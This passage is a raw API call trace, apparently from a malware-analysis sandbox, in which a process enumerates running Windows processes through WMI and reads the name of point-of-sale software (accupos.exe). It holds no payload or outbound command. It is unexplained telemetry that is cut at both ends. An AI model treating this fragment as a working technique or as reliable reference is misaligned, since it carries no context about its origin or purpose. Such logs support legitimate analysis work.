[0225.602] CoTaskMemAlloc (cb=0x4) returned 0x5eca748 [0225.602] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca748, puReturned=0x26dde18 | out: apObjects=0x5eca748*=0x5ecd108, puReturned=0x26dde18*=0x1) returned 0x0 [0225.603] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecd108) returned 0x0 [0225.603] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.603] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.604] IUnknown:AddRef (This=0x5ecd108) returned 0x3 [0225.604] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.604] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.604] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecd10c) returned 0x0 [0225.604] IMarshal:GetUnmarshalClass (in: This=0x5ecd10c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.604] IUnknown:Release (This=0x5ecd10c) returned 0x3 [0225.604] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.604] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.604] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.604] IUnknown:Release (This=0x5ecd108) returned 0x2 [0225.604] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.604] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.604] IUnknown:QueryInterface (in: This=0x5ecd108, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecd108) returned 0x0 [0225.604] IUnknown:AddRef (This=0x5ecd108) returned 0x4 [0225.604] IUnknown:Release (This=0x5ecd108) returned 0x3 [0225.604] IUnknown:Release (This=0x5ecd108) returned 0x2 [0225.604] CoTaskMemFree (pv=0x5eca748) [0225.605] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.605] IUnknown:AddRef (This=0x5ecd108) returned 0x3 [0225.605] IWbemClassObject:Get (in: This=0x5ecd108, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.605] IWbemClassObject:Get (in: This=0x5ecd108, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2756\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.605] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2756\"") returned 0x66 [0225.605] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2756\"") returned 0x66 [0225.605] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.605] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.605] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.605] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.606] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca748) returned 0x0 [0225.606] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca748, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.606] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca748, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2e68) returned 0x0 [0225.606] WbemDefPath:IUnknown:Release (This=0x5eca748) returned 0x0 [0225.606] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2e68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2e68) returned 0x0 [0225.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2e68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.607] WbemDefPath:IUnknown:AddRef (This=0x5ec2e68) returned 0x3 [0225.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2e68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2e68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2e68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca758) returned 0x0 [0225.607] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca758, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.607] WbemDefPath:IUnknown:Release (This=0x5eca758) returned 0x3 [0225.607] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.607] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2e68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.607] WbemDefPath:IUnknown:Release (This=0x5ec2e68) returned 0x2 [0225.607] WbemDefPath:IUnknown:Release (This=0x5ec2e68) returned 0x1 [0225.607] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.607] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2e68, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2e68) returned 0x0 [0225.607] WbemDefPath:IUnknown:AddRef (This=0x5ec2e68) returned 0x3 [0225.607] WbemDefPath:IUnknown:Release (This=0x5ec2e68) returned 0x2 [0225.607] WbemDefPath:IWbemPath:SetText (This=0x5ec2e68, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2756\"") returned 0x0 [0225.607] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.608] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.608] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.608] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.608] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.608] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.608] IWbemClassObject:Get (in: This=0x5ecd108, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fb06c*=0, plFlavor=0x26fb070*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x26fb06c*=8, plFlavor=0x26fb070*=0) returned 0x0 [0225.608] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0225.608] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0225.608] IWbemClassObject:Get (in: This=0x5ecd108, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fb06c*=8, plFlavor=0x26fb070*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="accupos.exe", varVal2=0x0), pType=0x26fb06c*=8, plFlavor=0x26fb070*=0) returned 0x0 [0225.608] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0225.608] SysStringByteLen (bstr="accupos.exe") returned 0x16 [0225.608] CoTaskMemAlloc (cb=0x4) returned 0x5eca788 [0225.608] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca788, puReturned=0x26dde18 | out: apObjects=0x5eca788*=0x5ecd2a0, puReturned=0x26dde18*=0x1) returned 0x0 [0225.609] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecd2a0) returned 0x0 [0225.609] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.609] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.610] IUnknown:AddRef (This=0x5ecd2a0) returned 0x3 [0225.610] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.610] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.610] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecd2a4) returned 0x0 [0225.610] IMarshal:GetUnmarshalClass (in: This=0x5ecd2a4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.610] IUnknown:Release (This=0x5ecd2a4) returned 0x3 [0225.610] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.610] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.610] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.610] IUnknown:Release (This=0x5ecd2a0) returned 0x2 [0225.610] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.610] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.610] IUnknown:QueryInterface (in: This=0x5ecd2a0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecd2a0) returned 0x0 [0225.610] IUnknown:AddRef (This=0x5ecd2a0) returned 0x4 [0225.610] IUnknown:Release (This=0x5ecd2a0) returned 0x3 [0225.610] IUnknown:Release (This=0x5ecd2a0) returned 0x2 [0225.610] CoTaskMemFree (pv=0x5eca788) [0225.611] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.611] IUnknown:AddRef (This=0x5ecd2a0) returned 0x3 [0225.611] IWbemClassObject:Get (in: This=0x5ecd2a0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.611] IWbemClassObject:Get (in: This=0x5ecd2a0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2764\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.611] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2764\"") returned 0x66 [0225.611] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2764\"") returned 0x66 [0225.611] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.611] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.611] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.611] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.612] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca788) returned 0x0 [0225.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca788, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.613] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca788, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2f48) returned 0x0 [0225.613] WbemDefPath:IUnknown:Release (This=0x5eca788) returned 0x0 [0225.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2f48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2f48) returned 0x0 [0225.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2f48, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.613] WbemDefPath:IUnknown:AddRef (This=0x5ec2f48) returned 0x3 [0225.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2f48, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2f48, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2f48, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca798) returned 0x0 [0225.613] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca798, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.613] WbemDefPath:IUnknown:Release (This=0x5eca798) returned 0x3 [0225.613] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.613] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2f48, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.613] WbemDefPath:IUnknown:Release (This=0x5ec2f48) returned 0x2 [0225.614] WbemDefPath:IUnknown:Release (This=0x5ec2f48) returned 0x1 [0225.614] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.614] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2f48, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2f48) returned 0x0 [0225.614] WbemDefPath:IUnknown:AddRef (This=0x5ec2f48) returned 0x3 [0225.614] WbemDefPath:IUnknown:Release (This=0x5ec2f48) returned 0x2 [0225.614] WbemDefPath:IWbemPath:SetText (This=0x5ec2f48, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2764\"") returned 0x0 [0225.614] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.614] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.614] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.614] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.614] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.614] 